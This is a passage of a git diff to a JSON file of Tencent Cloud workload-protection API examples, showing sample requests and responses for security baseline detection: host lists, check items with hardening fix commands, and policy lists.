0,\n \"FailedCount\": 0,\n \"TimeoutCount\": 0,\n \"PolicyDetectStatus\": 2\n },\n {\n \"PolicyId\": 257,\n \"TaskId\": 2351,\n \"HostCount\": 47,\n \"StartTime\": \"2022-08-19 00:00:00\",\n \"FinishTime\": \"2022-08-19 00:17:15\",\n \"PolicyName\": \"专业版主机弱口令+旗舰版\",\n \"SuccessCount\": 0,\n \"FailedCount\": 0,\n \"TimeoutCount\": 0,\n \"PolicyDetectStatus\": 2\n }\n ],\n \"RequestId\": \"48f973be-b1f0-4f58-aa9e-7a813655ee43\",\n \"Total\": 110\n }\n}",
|
1110
1096
|
"title": "检测列表"
|
1111
1097
|
}
|
1112
1098
|
],
|
@@ -1114,7 +1100,7 @@
|
|
1114
1100
|
{
|
1115
1101
|
"document": "",
|
1116
1102
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBaselineDetectOverview\n<公共请求参数>\n\n{}",
|
1117
|
-
"output": "{\n \"Response\": {\n \"LatestPassCount\": 0,\n \"HostCount\": 8,\n \"LatestNotPassCount\": 0,\n \"PolicyCount\": 18,\n \"PassRate\": 0,\n \"RequestId\": \"
|
1103
|
+
"output": "{\n \"Response\": {\n \"LatestPassCount\": 0,\n \"HostCount\": 8,\n \"LatestNotPassCount\": 0,\n \"PolicyCount\": 18,\n \"PassRate\": 0,\n \"RequestId\": \"935e27b1-d675-4509-80bf-96fbf0764237\",\n \"ItemCount\": 2955\n }\n}",
|
1118
1104
|
"title": "基线检测概要"
|
1119
1105
|
}
|
1120
1106
|
],
|
@@ -1122,7 +1108,7 @@
|
|
1122
1108
|
{
|
1123
1109
|
"document": "获取基线下载列表",
|
1124
1110
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBaselineDownloadList\n<公共请求参数>\n\n{}",
|
1125
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"TaskId\": 1,\n \"TaskName\": \"
|
1111
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"TaskId\": 1,\n \"TaskName\": \"taskName01\",\n \"Status\": 0,\n \"StartTime\": \"0001-01-01 00:00:00\",\n \"EndTime\": \"0001-01-01 00:00:00\",\n \"DownloadUrl\": \"http://www.a.b.c\"\n }\n ],\n \"RequestId\": \"b0596030-57ec-42aa-8e0f-738a6a07e2d0\",\n \"Total\": 1\n }\n}",
|
1126
1112
|
"title": "全部下载列表"
|
1127
1113
|
}
|
1128
1114
|
],
|
@@ -1130,7 +1116,7 @@
|
|
1130
1116
|
{
|
1131
1117
|
"document": "根据基线id查询基线影响主机列表数据",
|
1132
1118
|
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeBaselineEffectHostList\n&Limit=10\n&Offset=0\n&BaselineId=100441\n&StrategyId=1\n&<公共请求参数>",
|
1133
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"TotalCount\": 21,\n \"EffectHostList\": [\n {\n \"PassCount\": 100,\n \"FailCount\": 100,\n \"FirstScanTime\": \"2019-12-25 11:57:15\",\n \"LastScanTime\": \"2019-12-25 11:57:15\",\n \"Status\": 0,\n \"Quuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"HostIp\": \"
|
1119
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"TotalCount\": 21,\n \"EffectHostList\": [\n {\n \"PassCount\": 100,\n \"FailCount\": 100,\n \"FirstScanTime\": \"2019-12-25 11:57:15\",\n \"LastScanTime\": \"2019-12-25 11:57:15\",\n \"Status\": 0,\n \"Quuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"HostIp\": \"127.0.0.1\",\n \"AliasName\": \"销售许可测试机器\",\n \"Uuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"MaxStatus\": 2\n }\n ]\n }\n}",
|
1134
1120
|
"title": "基线影响主机列表接口"
|
1135
1121
|
}
|
1136
1122
|
],
|
@@ -1138,7 +1124,7 @@
|
|
1138
1124
|
{
|
1139
1125
|
"document": "全部修复",
|
1140
1126
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBaselineFixList\n<公共请求参数>\n\n{}",
|
1141
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"
|
1127
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"MachineExtraInfo\": {\n \"HostName\": \"demo-instance\",\n \"InstanceID\": \"ins-1002\",\n \"NetworkName\": \"vpc-1002\",\n \"NetworkType\": 1,\n \"PrivateIP\": \"1.1.1.1\",\n \"WanIP\": \"1.1.1.1\"\n },\n \"Id\": 334525,\n \"ItemName\": \"Memcached UDP 端口可被利用为 DDOS 放大攻击\",\n \"HostIp\": \"172.16.64.15\",\n \"CreateTime\": \"2022-05-18 00:12:20\",\n \"ModifyTime\": \"2022-07-28 15:02:32\",\n \"FixTime\": \"2022-06-13 16:00:03\"\n },\n {\n \"MachineExtraInfo\": {\n \"HostName\": \"demo-instance\",\n \"InstanceID\": \"ins-1002\",\n \"NetworkName\": \"vpc-1002\",\n \"NetworkType\": 1,\n \"PrivateIP\": \"1.1.1.1\",\n \"WanIP\": \"1.1.1.1\"\n },\n \"Id\": 335549,\n \"ItemName\": \"确保在/tmp分区上设置nodev选项\",\n \"HostIp\": \"10.0.22.10\",\n \"CreateTime\": \"2022-05-26 16:14:51\",\n \"ModifyTime\": \"2022-07-28 15:02:32\",\n \"FixTime\": \"2022-06-15 17:02:55\"\n }\n ],\n \"RequestId\": \"8a667d00-bc48-4ab7-8725-cd6728e121ca\",\n \"Total\": 1402\n }\n}",
|
1142
1128
|
"title": "全部修复"
|
1143
1129
|
}
|
1144
1130
|
],
|
@@ -1146,7 +1132,7 @@
|
|
1146
1132
|
{
|
1147
1133
|
"document": "",
|
1148
1134
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBaselineHostDetectList\n<公共请求参数>\n\n{}",
|
1149
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"HostId\": \"a0770b41-9697-4a1d-8150-b8fa247b6189\",\n \"HostIp\": \"172.23.16.10\",\n \"HostName\": \"功能测试ubuntu20漏洞修复v_txmitan\",\n \"WanIp\": \"10.104.9.1\",\n \"DetectStatus\": 0,\n \"PassedItemCount\": 188,\n \"NotPassedItemCount\": 202,\n \"ItemCount\": 390,\n \"FirstTime\": \"2022-05-11 17:11:32\",\n \"LastTime\": \"2022-08-23 14:28:51\",\n \"
|
1135
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"HostId\": \"a0770b41-9697-4a1d-8150-b8fa247b6189\",\n \"HostIp\": \"172.23.16.10\",\n \"HostName\": \"功能测试ubuntu20漏洞修复v_txmitan\",\n \"WanIp\": \"10.104.9.1\",\n \"DetectStatus\": 0,\n \"PassedItemCount\": 188,\n \"NotPassedItemCount\": 202,\n \"ItemCount\": 390,\n \"FirstTime\": \"2022-05-11 17:11:32\",\n \"LastTime\": \"2022-08-23 14:28:51\",\n \"MachineExtraInfo\": {\n \"WanIP\": \"146.56.21****\",\n \"PrivateIP\": \"10.206****\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-3gov****\",\n \"InstanceID\": \"ins-bask****\",\n \"HostName\": \"demo_****\"\n },\n \"Uuid\": \"a0770b41-9697-4a1d-8150-b8fa247b6189\"\n }\n ],\n \"RequestId\": \"fca17381-b0fa-45c4-8568-82c186be9dc0\",\n \"Total\": 36\n }\n}",
|
1150
1136
|
"title": "主机视角检测列表"
|
1151
1137
|
}
|
1152
1138
|
],
|
@@ -1154,7 +1140,7 @@
|
|
1154
1140
|
{
|
1155
1141
|
"document": "",
|
1156
1142
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBaselineHostIgnoreList\n<公共请求参数>\n\n{\n \"RuleID\": \"126\"\n}",
|
1157
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"HostId\": \"d8feb20e-dcdd-461b-9b37-336c42d48657\",\n \"HostName\": \"功能测试软件较多_ivon\",\n \"HostTag\": \"
|
1143
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"MachineExtraInfo\": {\n \"HostName\": \"demo-instance\",\n \"InstanceID\": \"ins-1002\",\n \"NetworkName\": \"vpc-1002\",\n \"NetworkType\": 1,\n \"PrivateIP\": \"1.1.1.1\",\n \"WanIP\": \"1.1.1.1\"\n },\n \"HostId\": \"d8feb20e-dcdd-461b-9b37-336c42d48657\",\n \"HostName\": \"功能测试软件较多_ivon\",\n \"HostTag\": \"tag***\",\n \"HostIp\": \"172.16.0.49\",\n \"WanIp\": \"10.104.9.1\"\n }\n ],\n \"RequestId\": \"0eb82ff4-667a-4525-82b5-e304aee952ee\",\n \"Total\": 1\n }\n}",
|
1158
1144
|
"title": "忽略规则关联的主机"
|
1159
1145
|
}
|
1160
1146
|
],
|
@@ -1162,7 +1148,7 @@
|
|
1162
1148
|
{
|
1163
1149
|
"document": "",
|
1164
1150
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBaselineHostRiskTop\n<公共请求参数>\n\n{}",
|
1165
|
-
"output": "{\n \"Response\": {\n \"HostRiskTop5\": [\n {\n \"HostId\": \"36a78a1e-7711-4e7f-9fbe-c7afab78cd78\",\n \"HostName\": \"jaryzhou-编码测试\",\n \"SeriousCount\": 0,\n \"HighCount\": 32,\n \"MediumCount\": 126,\n \"LowCount\": 45\n },\n {\n \"HostId\": \"a0770b41-9697-4a1d-8150-b8fa247b6189\",\n \"HostName\": \"功能测试ubuntu20漏洞修复v_txmitan\",\n \"SeriousCount\": 0,\n \"HighCount\": 33,\n \"MediumCount\": 125,\n \"LowCount\": 44\n },\n {\n \"HostId\": \"cc0e8a25-7169-4b5c-a929-2b4cccbfce10\",\n \"HostName\": \"功能测试ubuntu18漏洞修复v_txmitan\",\n \"SeriousCount\": 0,\n \"HighCount\": 17,\n \"MediumCount\":
|
1151
|
+
"output": "{\n \"Response\": {\n \"HostRiskTop5\": [\n {\n \"HostId\": \"36a78a1e-7711-4e7f-9fbe-c7afab78cd78\",\n \"HostName\": \"jaryzhou-编码测试\",\n \"SeriousCount\": 0,\n \"HighCount\": 32,\n \"MediumCount\": 126,\n \"LowCount\": 45\n },\n {\n \"HostId\": \"a0770b41-9697-4a1d-8150-b8fa247b6189\",\n \"HostName\": \"功能测试ubuntu20漏洞修复v_txmitan\",\n \"SeriousCount\": 0,\n \"HighCount\": 33,\n \"MediumCount\": 125,\n \"LowCount\": 44\n },\n {\n \"HostId\": \"cc0e8a25-7169-4b5c-a929-2b4cccbfce10\",\n \"HostName\": \"功能测试ubuntu18漏洞修复v_txmitan\",\n \"SeriousCount\": 0,\n \"HighCount\": 17,\n \"MediumCount\": \"0\",\n \"LowCount\": 43\n },\n {\n \"HostId\": \"69796250-2a3a-40ef-b418-676e677019a4\",\n \"HostName\": \"piperpeng\",\n \"SeriousCount\": 0,\n \"HighCount\": 25,\n \"MediumCount\": 116,\n \"LowCount\": 23\n },\n {\n \"HostId\": \"dbf3dcd4-179a-4bc6-86e4-15439f4cc898\",\n \"HostName\": \"漏洞yhvs编译机-linux\",\n \"SeriousCount\": 0,\n \"HighCount\": 25,\n \"MediumCount\": 117,\n \"LowCount\": 21\n }\n ],\n \"RequestId\": \"fc13bcdc-464f-4f94-a985-239e499d0bc0\"\n }\n}",
|
1166
1152
|
"title": "主机风险top5"
|
1167
1153
|
}
|
1168
1154
|
],
|
@@ -1170,7 +1156,7 @@
|
|
1170
1156
|
{
|
1171
1157
|
"document": "查询服务器风险top接口",
|
1172
1158
|
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeBaselineHostTop\n&Top=5\n&StrategyId=1\n&<公共请求参数>",
|
1173
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"f1dd9f5e-4ac0-48a7-9410-c86d24656d9a\",\n \"BaselineHostTopList\": [\n {\n \"HostName\": \"1号主机\"\n }\n ]\n }\n}",
|
1159
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"f1dd9f5e-4ac0-48a7-9410-c86d24656d9a\",\n \"BaselineHostTopList\": [\n {\n \"HostName\": \"1号主机\",\n \"Quuid\": \"a0770b41-9697-4a1d-8150-b8fa247b6*****\",\n \"Score\": 1002,\n \"EventLevelList\": [\n {\n \"EventLevel\": 2,\n \"EventCount\": 28\n }\n ]\n }\n ]\n }\n}",
|
1174
1160
|
"title": "服务器风险top接口"
|
1175
1161
|
}
|
1176
1162
|
],
|
@@ -1178,22 +1164,22 @@
|
|
1178
1164
|
{
|
1179
1165
|
"document": "",
|
1180
1166
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBaselineItemDetectList\n<公共请求参数>\n\n{}",
|
1181
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"ItemId\": 2162,\n \"ItemName\": \"确保配置/etc/shadow的权限\",\n \"ItemDesc\": \"/etc/shadow
|
1167
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"ItemId\": 2162,\n \"ItemName\": \"确保配置/etc/shadow的权限\",\n \"ItemDesc\": \"/etc/shadow文件用于存储有关用户账户的信息,这些信息对于这些账户的安全性至关重要,例如哈希密码和其他安全信息。\",\n \"FixMethod\": \"运行以下命令以设置/etc/shadow的权限:\\n# chown root:root /etc/shadow# chmod 000 /etc/shadow\\n\",\n \"RuleId\": 13,\n \"RuleName\": \"国际标准-CentOS 7安全基线检查Level1\",\n \"HostCount\": 1,\n \"FirstTime\": \"2022-07-18 13:33:12\",\n \"LastTime\": \"2022-07-21 21:25:01\",\n \"DetectStatus\": 3,\n \"Level\": 2,\n \"DetectResult\": \"result***\",\n \"PassedHostCount\": 1,\n \"NotPassedHostCount\": 0\n },\n {\n \"ItemId\": 2163,\n \"ItemName\": \"确保未启用rsync服务\",\n \"ItemDesc\": \"rsyncd服务可用于通过网络链接在系统之间同步文件。\",\n \"FixMethod\": \"运行以下命令以禁用rsync:\\n #systemctl disable rsyncd \\n\",\n \"RuleId\": 13,\n \"RuleName\": \"国际标准-CentOS 7安全基线检查Level1\",\n \"HostCount\": 1,\n \"FirstTime\": \"2022-07-18 13:33:12\",\n \"LastTime\": \"2022-07-21 21:25:01\",\n \"DetectStatus\": 3,\n \"Level\": 2,\n \"DetectResult\": \"result***\",\n \"PassedHostCount\": 1,\n \"NotPassedHostCount\": 0\n },\n {\n \"ItemId\": 2164,\n \"ItemName\": \"确保在/var/tmp分区上设置noexec选项\",\n \"ItemDesc\": \"noexec挂载选项指定文件系统不能包含可执行二进制文件。\",\n \"FixMethod\": \"编辑/etc/fstab文件并将noexec添加到/var/tmp分区的第四个字段\\n运行以下命令重新挂载/var/tmp:\\n# mount -o remount,noexec /var/tmp\\n\",\n \"RuleId\": 13,\n \"RuleName\": \"国际标准-CentOS 7安全基线检查Level1\",\n \"HostCount\": 1,\n \"FirstTime\": \"2022-07-18 13:33:12\",\n \"LastTime\": \"2022-07-21 21:25:01\",\n \"DetectStatus\": 3,\n \"Level\": 2,\n \"DetectResult\": \"result***\",\n \"PassedHostCount\": 1,\n \"NotPassedHostCount\": 0\n },\n {\n \"ItemId\": 2166,\n \"ItemName\": \"确保未启用HTTP代理服务\",\n \"ItemDesc\": \"Squid是许多发行版和环境中使用的标准代理服务器。\",\n \"FixMethod\": \"运行以下命令以禁用squid:\\n #systemctl disable squid \\n\",\n \"RuleId\": 13,\n \"RuleName\": \"国际标准-CentOS 7安全基线检查Level1\",\n \"HostCount\": 1,\n \"FirstTime\": \"2022-07-18 13:33:12\",\n \"LastTime\": \"2022-07-21 21:25:01\",\n \"DetectStatus\": 3,\n \"Level\": 2,\n \"DetectResult\": \"result***\",\n \"PassedHostCount\": 1,\n \"NotPassedHostCount\": 0\n },\n {\n \"ItemId\": 2169,\n \"ItemName\": \"确保在/tmp分区上设置noexec选项\",\n \"ItemDesc\": \"noexec挂载选项的文件系统不能包含可执行的二进制文件。\",\n \"FixMethod\": \"编辑/etc/systemd/system/local-fs.target.wants/tmp.mount以将noexec添加到/tmp挂载选项:\\n[Mount]Options=mode=1777,strictatime,noexec,nodev,nosuid\\n运行以下命令重新挂载/tmp:\\n# mount -o remount,noexec /tmp\\n\",\n \"RuleId\": 13,\n \"RuleName\": \"国际标准-CentOS 7安全基线检查Level1\",\n \"HostCount\": 1,\n \"FirstTime\": \"2022-07-18 13:33:12\",\n \"LastTime\": \"2022-07-21 21:25:01\",\n \"DetectStatus\": 3,\n \"Level\": 2,\n \"DetectResult\": \"result***\",\n \"PassedHostCount\": 1,\n \"NotPassedHostCount\": 0\n },\n {\n \"ItemId\": 2172,\n \"ItemName\": \"专用服务检测,确保未启用tftp服务\",\n \"ItemDesc\": \"普通文件传输协议(TFTP)是一种简单的文件传输协议,通常用于从引导服务器自动传输配置或引导计算机。软件包tftp-server用于定义和支持TFTP服务器。\",\n \"FixMethod\": \"运行以下命令禁用tftp:\\n# systemctl disable tftp.socket\",\n \"RuleId\": 13,\n \"RuleName\": \"国际标准-CentOS 7安全基线检查Level1\",\n \"HostCount\": 1,\n \"FirstTime\": \"2022-07-18 13:33:12\",\n \"LastTime\": \"2022-07-21 21:25:01\",\n \"DetectStatus\": 3,\n \"Level\": 2,\n \"DetectResult\": \"result***\",\n \"PassedHostCount\": 1,\n \"NotPassedHostCount\": 0\n },\n {\n \"ItemId\": 2179,\n \"ItemName\": \"确保/etc/shadow中没有遗留的“ +”条目\",\n \"ItemDesc\": \"各种文件中的字符+曾经是系统在系统配置文件中某个点从NIS映射插入数据的标记。这些条目在大多数系统上不再需要,但可能存在于从其他平台导入的文件中。\\n\",\n \"FixMethod\": \"从/etc/shadow删除任何旧的“+”条目中\",\n \"RuleId\": 13,\n \"RuleName\": \"国际标准-CentOS 7安全基线检查Level1\",\n \"HostCount\": 1,\n \"FirstTime\": \"2022-07-18 13:33:12\",\n \"LastTime\": \"2022-07-21 21:25:01\",\n \"DetectStatus\": 3,\n \"Level\": 2,\n \"DetectResult\": \"result***\",\n \"PassedHostCount\": 1,\n \"NotPassedHostCount\": 0\n },\n {\n \"ItemId\": 2181,\n \"ItemName\": \"确保未启用Avahi Server\",\n \"ItemDesc\": \"Avahi允许程序发布和发现在本地网络上运行且没有特定配置的服务和主机\",\n \"FixMethod\": \"运行以下命令以禁用avahi-daemon:\\n #systemctl disable avahi-daemon \\n\",\n \"RuleId\": 13,\n \"RuleName\": \"国际标准-CentOS 7安全基线检查Level1\",\n \"HostCount\": 1,\n \"FirstTime\": \"2022-07-18 13:33:12\",\n \"LastTime\": \"2022-07-21 21:25:01\",\n \"DetectStatus\": 3,\n \"Level\": 2,\n \"DetectResult\": \"result***\",\n \"PassedHostCount\": 1,\n \"NotPassedHostCount\": 0\n },\n {\n \"ItemId\": 2185,\n \"ItemName\": \"确保在/var/tmp分区上设置nodev选项\",\n \"ItemDesc\": \"nodev挂载选项指定文件系统不能包含特殊设备。\",\n \"FixMethod\": \"编辑/etc/fstab文件并将nodev添加到/var/tmp分区的第四个字段(挂载选项)。\\n运行以下命令重新挂载/var/tmp:\\n# mount -o remount,nodev /var/tmpq\\n\",\n \"RuleId\": 13,\n \"RuleName\": \"国际标准-CentOS 7安全基线检查Level1\",\n \"HostCount\": 1,\n \"FirstTime\": \"2022-07-18 13:33:12\",\n \"LastTime\": \"2022-07-21 21:25:01\",\n \"DetectStatus\": 3,\n \"Level\": 2,\n \"DetectResult\": \"result***\",\n \"PassedHostCount\": 1,\n \"NotPassedHostCount\": 0\n },\n {\n \"ItemId\": 2189,\n \"ItemName\": \"确保未启用HTTP服务\",\n \"ItemDesc\": \"HTTP或Web服务器提供托管网站内容的功能。\",\n \"FixMethod\": \"运行以下命令以禁用httpd:\\n #systemctl disable httpd \\n\",\n \"RuleId\": 13,\n \"RuleName\": \"国际标准-CentOS 7安全基线检查Level1\",\n \"HostCount\": 1,\n \"FirstTime\": \"2022-07-18 13:33:12\",\n \"LastTime\": \"2022-07-21 21:25:01\",\n \"DetectStatus\": 3,\n \"Level\": 2,\n \"DetectResult\": \"result***\",\n \"PassedHostCount\": 1,\n \"NotPassedHostCount\": 0\n }\n ],\n \"RequestId\": \"d93119fb-5ea9-4dc4-8e1a-b878dc62c67c\",\n \"Total\": 169\n }\n}",
|
1182
1168
|
"title": "全部检测项视角结果"
|
1183
1169
|
}
|
1184
1170
|
],
|
1185
1171
|
"DescribeBaselineItemIgnoreList": [
|
1186
1172
|
{
|
1187
|
-
"document": "
|
1173
|
+
"document": "忽略检测项列表",
|
1188
1174
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBaselineItemIgnoreList\n<公共请求参数>\n\n{\n \"RuleID\": 125\n}",
|
1189
1175
|
"output": "{\n \"Response\": {\n \"List\": [],\n \"RequestId\": \"529a6a2c-91ef-44e3-a822-953846e0e596\",\n \"Total\": 0\n }\n}",
|
1190
|
-
"title": "
|
1176
|
+
"title": "忽略检测项列表"
|
1191
1177
|
},
|
1192
1178
|
{
|
1193
|
-
"document": "
|
1179
|
+
"document": "检测项列表",
|
1194
1180
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBaselineItemIgnoreList\n<公共请求参数>\n\n{\n \"RuleID\": 125\n}",
|
1195
1181
|
"output": "{\n \"Response\": {\n \"List\": [],\n \"RequestId\": \"529a6a2c-91ef-44e3-a822-953846e0e596\",\n \"Total\": 0\n }\n}",
|
1196
|
-
"title": "
|
1182
|
+
"title": "检测项列表"
|
1197
1183
|
}
|
1198
1184
|
],
|
1199
1185
|
"DescribeBaselineItemInfo": [
|
@@ -1208,7 +1194,7 @@
|
|
1208
1194
|
{
|
1209
1195
|
"document": "",
|
1210
1196
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBaselineItemList\n<公共请求参数>\n\n{\n \"Limit\": \"1\",\n \"Offset\": \"1\"\n}",
|
1211
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"ItemId\": 3077,\n \"ItemName\": \"确保未启用DNS服务\",\n \"CategoryId\": 19,\n \"ItemDesc\": \"域名系统(DNS)是一种分层命名系统,它将名称映射到IP地址,以连接到网络的计算机,服务和其他资源。\\n\",\n \"FixMethod\": \"运行以下命令以禁用named:\\n# systemctl disable bind9\",\n \"RuleName\": \"国际标准-Ubuntu 16安全基线检查Level1\",\n \"DetectResultDesc\": \"\",\n \"Level\": 2,\n \"CanBeFixed\": 0,\n \"DetectStatus\": 3,\n \"HostName\": \"功能测试ubuntu16漏洞修复v_txmitan\",\n \"HostIp\": \"172.23.16.14\",\n \"HostId\": \"044889f8-d6a2-4fc3-a8a8-c114b6f5266b\",\n \"WanIp\": \"10.104.9.1\",\n \"LastTime\": \"2022-08-22 09:48:42\",\n \"FirstTime\": \"2022-08-06 09:43:07\",\n \"Uuid\": \"044889f8-d6a2-4fc3-a8a8-c114b6f5266b\"\n }\n ],\n \"RequestId\": \"3a2b20bc-2e93-46b3-8bb7-b655aa249c00\",\n \"Total\": 8412\n }\n}",
|
1197
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"ItemId\": 3077,\n \"ItemName\": \"确保未启用DNS服务\",\n \"CategoryId\": 19,\n \"ItemDesc\": \"域名系统(DNS)是一种分层命名系统,它将名称映射到IP地址,以连接到网络的计算机,服务和其他资源。\\n\",\n \"FixMethod\": \"运行以下命令以禁用named:\\n# systemctl disable bind9\",\n \"RuleName\": \"国际标准-Ubuntu 16安全基线检查Level1\",\n \"DetectResultDesc\": \"idesc\",\n \"Level\": 2,\n \"CanBeFixed\": 0,\n \"DetectStatus\": 3,\n \"HostName\": \"功能测试ubuntu16漏洞修复v_txmitan\",\n \"HostIp\": \"172.23.16.14\",\n \"HostId\": \"044889f8-d6a2-4fc3-a8a8-c114b6f5266b\",\n \"WanIp\": \"10.104.9.1\",\n \"LastTime\": \"2022-08-22 09:48:42\",\n \"FirstTime\": \"2022-08-06 09:43:07\",\n \"MachineExtraInfo\": {\n \"WanIP\": \"146.56.21****\",\n \"PrivateIP\": \"10.206****\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-3gov****\",\n \"InstanceID\": \"ins-bask****\",\n \"HostName\": \"demo_****\"\n },\n \"Uuid\": \"044889f8-d6a2-4fc3-a8a8-c114b6f5266b\"\n }\n ],\n \"RequestId\": \"3a2b20bc-2e93-46b3-8bb7-b655aa249c00\",\n \"Total\": 8412\n }\n}",
|
1212
1198
|
"title": "检测项结果"
|
1213
1199
|
}
|
1214
1200
|
],
|
@@ -1224,7 +1210,7 @@
|
|
1224
1210
|
{
|
1225
1211
|
"document": "根据过滤参数查询基线列表信息",
|
1226
1212
|
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeBaselineList\n&Limit=10\n&Offset=0\n&<公共请求参数>",
|
1227
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"f1dd9f5e-4ac0-48a7-9410-c86d24656d9a\",\n \"TotalCount\": 2,\n \"BaselineList\": [\n {\n \"Name\": \"基线名1\",\n \"Level\": 1,\n \"RuleCount\": 11,\n \"HostCount\": 12,\n \"Status\": 0
|
1213
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"f1dd9f5e-4ac0-48a7-9410-c86d24656d9a\",\n \"TotalCount\": 2,\n \"BaselineList\": [\n {\n \"Name\": \"基线名1\",\n \"Level\": 1,\n \"RuleCount\": 11,\n \"HostCount\": 12,\n \"Status\": 0,\n \"CategoryId\": 2,\n \"LastScanTime\": \"2024-11-04 03:43:26\",\n \"MaxStatus\": 2,\n \"BaselineFailCount\": 29\n }\n ]\n }\n}",
|
1228
1214
|
"title": "查询基线列表接口"
|
1229
1215
|
}
|
1230
1216
|
],
|
@@ -1232,7 +1218,7 @@
|
|
1232
1218
|
{
|
1233
1219
|
"document": "",
|
1234
1220
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBaselinePolicyList\n<公共请求参数>\n\n{}",
|
1235
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"PolicyName\": \"
|
1221
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"PolicyName\": \"专业版主机弱口令+旗舰版\",\n \"DetectInterval\": 1,\n \"DetectTime\": \"00:00:00\",\n \"IsEnabled\": 1,\n \"AssetType\": 1,\n \"RuleIds\": [\n 50\n ],\n \"HostIds\": [\n \"044889f8-d6a2-4fc3-a8a8-c114b6f5266b\",\n \"a0770b41-9697-4a1d-8150-b8fa247b6189\",\n \"cc0e8a25-7169-4b5c-a929-2b4cccbfce10\"\n ],\n \"HostIps\": [\n \"1.1.1.1\"\n ],\n \"PolicyId\": 172,\n \"RuleCount\": 1,\n \"ItemCount\": 1,\n \"HostCount\": 3,\n \"IsDefault\": 0\n }\n ],\n \"RequestId\": \"5c340825-dbc9-4410-a47f-75eab15769d7\",\n \"Total\": 19\n }\n}",
|
1236
1222
|
"title": "策略列表"
|
1237
1223
|
}
|
1238
1224
|
],
|
@@ -1240,7 +1226,7 @@
|
|
1240
1226
|
{
|
1241
1227
|
"document": "根据基线id与条件查询基线检测项信息",
|
1242
1228
|
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeBaselineRule\n&BaselineId=100441\n&Level.0=1\n&Status=0\n&Quuid=\"8c8a-69e3ab73aa8a\"\n&Uuid=\"asdasd123-124sfas\"\n&Limit=10\n&Offset=0\n&<公共请求参数>",
|
1243
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"TotalCount\": 21,\n \"ShowRuleRemark\": true,\n \"BaselineRuleList\": [\n {\n \"RuleName\": \"安全检测项目1\",\n \"Description\": \"安全检测项目1描述\",\n \"FixMessage\": \"重新启动服务\",\n \"Level\": 1,\n \"Status\": 0,\n \"RuleId\": 1,\n \"LastScanAt\": \"2020-09-16 :00:00:00\",\n \"EventId\": 1,\n \"Uuid\": \"Uuid\"\n }\n ]\n }\n}",
|
1229
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"TotalCount\": 21,\n \"ShowRuleRemark\": true,\n \"BaselineRuleList\": [\n {\n \"RuleName\": \"安全检测项目1\",\n \"Description\": \"安全检测项目1描述\",\n \"FixMessage\": \"重新启动服务\",\n \"Level\": 1,\n \"Status\": 0,\n \"RuleId\": 1,\n \"RuleRemark\": \"集成测试\",\n \"LastScanAt\": \"2020-09-16 :00:00:00\",\n \"EventId\": 1,\n \"Uuid\": \"Uuid\"\n }\n ]\n }\n}",
|
1244
1230
|
"title": "查询基线检测项信息"
|
1245
1231
|
}
|
1246
1232
|
],
|
@@ -1264,15 +1250,15 @@
|
|
1264
1250
|
{
|
1265
1251
|
"document": "",
|
1266
1252
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBaselineRuleIgnoreList\n<公共请求参数>\n\n{}",
|
1267
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"RuleName\": \"
|
1253
|
+
